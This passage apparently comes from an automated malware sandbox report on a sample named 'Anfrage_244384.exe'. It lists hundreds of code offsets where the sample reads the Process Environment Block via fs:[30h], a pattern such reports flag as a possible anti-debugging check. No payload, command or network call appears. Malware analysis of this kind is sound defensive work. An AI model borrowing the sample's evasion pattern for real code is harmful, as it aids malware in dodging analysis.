Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F5BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D660 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745636 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF603 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1607 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D6F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A36EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A16CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34743749 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473972B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F72E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5734 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677703 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D7E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347437B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F97A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F78A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F106E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745060 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471705E mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471705E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B052 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473903E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346950E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346950E4 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347450D9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED0C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED0C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346990DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D08D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FD080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675096 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A909C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D090 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D090 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34709179 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745152 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669148 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34703140 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677152 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B136 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671131 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671131 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346951EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347171F9 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346751ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347431E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347451CB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347211A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468B1B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34725180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34725180 mov eax, dword ptr fs:[00000030h]
